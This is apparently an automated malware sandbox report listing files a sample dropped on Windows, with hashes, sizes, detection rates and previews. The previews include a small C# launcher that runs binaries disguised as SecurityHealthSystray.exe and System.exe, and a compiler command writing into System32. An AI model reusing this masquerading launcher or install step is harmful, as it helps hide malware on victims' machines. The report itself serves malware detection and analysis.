                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:H/lZ9O9/OxztDfHxwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:jvNx6KhmMluOulajfqXSfbNtmh1Z
                                                                                                    MD5:EEE55D831BFBB02C82CA697CF9461CCA
                                                                                                    SHA1:47C7A50B64117F3DC7B74CF49161B2EFEF4645BE
                                                                                                    SHA-256:1B91FCAFB6FD980F72F15C3744111FA5ADFF13F4CDA584310F4DB0C28F755EC7
                                                                                                    SHA-512:8A498552DCF3AE0F2030F7CE1C16A977DECD699A024CD1035F1A98594CD159BB3E84A1F94DD09C94397FEFC974E53A104F9F878584977F12B7587244C8BFA20B
                                                                                                    Malicious:false
                                                                                                    Preview:L....Nyg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES2DC7.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):4.4838561897747224
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ok8wtdTn:58wth
                                                                                                    MD5:0514D218A08001DCFA11154F31C63C1E
                                                                                                    SHA1:17206916FE61C56331B10694C7690FC2DF45B39F
                                                                                                    SHA-256:41092D9CA47F48ECE6DD0B4628648C193A2A832B396EDD4E30B4E79F3B9C668C
                                                                                                    SHA-512:FEA2EBD111AC65651CEEF20BA1A58E4F552ECAE6A399AAB6374BAA610679D3063E1C884F884C3E1DC1F0AD103EEE9C0084AA8B064DE9F8C50A4D6ADCD8D553BC
                                                                                                    Malicious:false
                                                                                                    Preview:yGAA63Rzpw3nIbBFDg5mhcQSf
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49152
                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):419
                                                                                                    Entropy (8bit):4.9133973933122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6uYAqBWRtiFkD:JNVQIbSfhV7TiFkMSfhWYRkFkD
                                                                                                    MD5:4632EC9B170D0C420501FD4DD4779CB6
                                                                                                    SHA1:4C6225BB9C450F77DCCF94BE69C8F247C17C52E2
                                                                                                    SHA-256:68DA30FAABE641853A1C817A06F82CF8FD9E24E4CA6C934BC4FC86E43F926410
                                                                                                    SHA-512:72B746D649D1E00A6E2E1FB26284765DCD56126A15A3E466AE44ABC90CCD12A066BF111FC41BE32378C50284478B42EB07E1546FC02635970F521E987790F983
                                                                                                    Malicious:false
                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"); } catch { } }).Start();. }.}.
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):250
                                                                                                    Entropy (8bit):5.090908473425903
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fd9:Hu7L//TRq79cQWfF9
                                                                                                    MD5:3A883E564CB1FAD570B7EB6CCE005A71
                                                                                                    SHA1:72C8C3F0B14872E0ED6708217FF9557595E6B081
                                                                                                    SHA-256:1C9EB839FBB6B85A3FCC52AEA6378EF3E7EFDA25DD35C5951B9E072FA6148B28
                                                                                                    SHA-512:0AFC1B5D0835B324A1ABC3277C3FF7B219B5F1077A6E6AF2F5788E4B94AC15B6B43748960E0952C50E95D4F54ECE3EE26464F5CDEBEA72FCCF50A21D20DDC2CE
                                                                                                    Malicious:true
                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.0.cs"
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):750
                                                                                                    Entropy (8bit):5.261343534484639
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfF4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfqKax5DqBVKVrdFAMb
                                                                                                    MD5:B325188F80F4503267419A9B6A1E560C
                                                                                                    SHA1:CD643CCD695261F7AF1340DDFAF56AFEBED0104B
                                                                                                    SHA-256:25D0648194A84973F7F9CF31A75CBDD61A37CEC7F48600D2AF7336FDCBDC9553
                                                                                                    SHA-512:307FB05DFC94A3F7E042871AFE628B975687554A24C661AF9E03083F986614E19D0F4B9C358E80832A62B314355DF3DB3F146A7CA581D977F0CD788C43C38351
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32256
                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                                                                    • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                                                                    • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                                                                    • Filename: lEwK4xROgV.exe, Detection: malicious, Browse
                                                                                                    • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                                                                    • Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse
                                                                                                    • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                    • Filename: updIMdPUj8.exe, Detection: malicious, Browse
                                                                                                    • Filename: t8F7Ic986c.exe, Detection: malicious, Browse
                                                                                                    • Filename: 544WP3NHaP.exe, Detection: malicious, Browse
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34304
                                                                                                    Entropy (8bit):5.618776214605176
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33792
                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24576
                                                                                                    Entropy (8bit):5.535426842040921
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                    MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                    SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                    SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                    SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34304
                                                                                                    Entropy (8bit):5.618776214605176
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):342528
                                                                                                    Entropy (8bit):6.170134230759619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                    MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                    SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                    SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                    SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38912
                                                                                                    Entropy (8bit):5.679286635687991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36352
                                                                                                    Entropy (8bit):5.668291349855899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):50176
                                                                                                    Entropy (8bit):5.723168999026349
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                    MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                    SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                    SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                    SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38400
                                                                                                    Entropy (8bit):5.699005826018714
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                    SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294912
                                                                                                    Entropy (8bit):6.010605469502259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33792
                                                                                                    Entropy (8bit):5.541771649974822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38400
                                                                                                    Entropy (8bit):5.699005826018714
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                    MD5:87765D141228784AE91334BAE25AD743
                                                                                                    SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                    SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
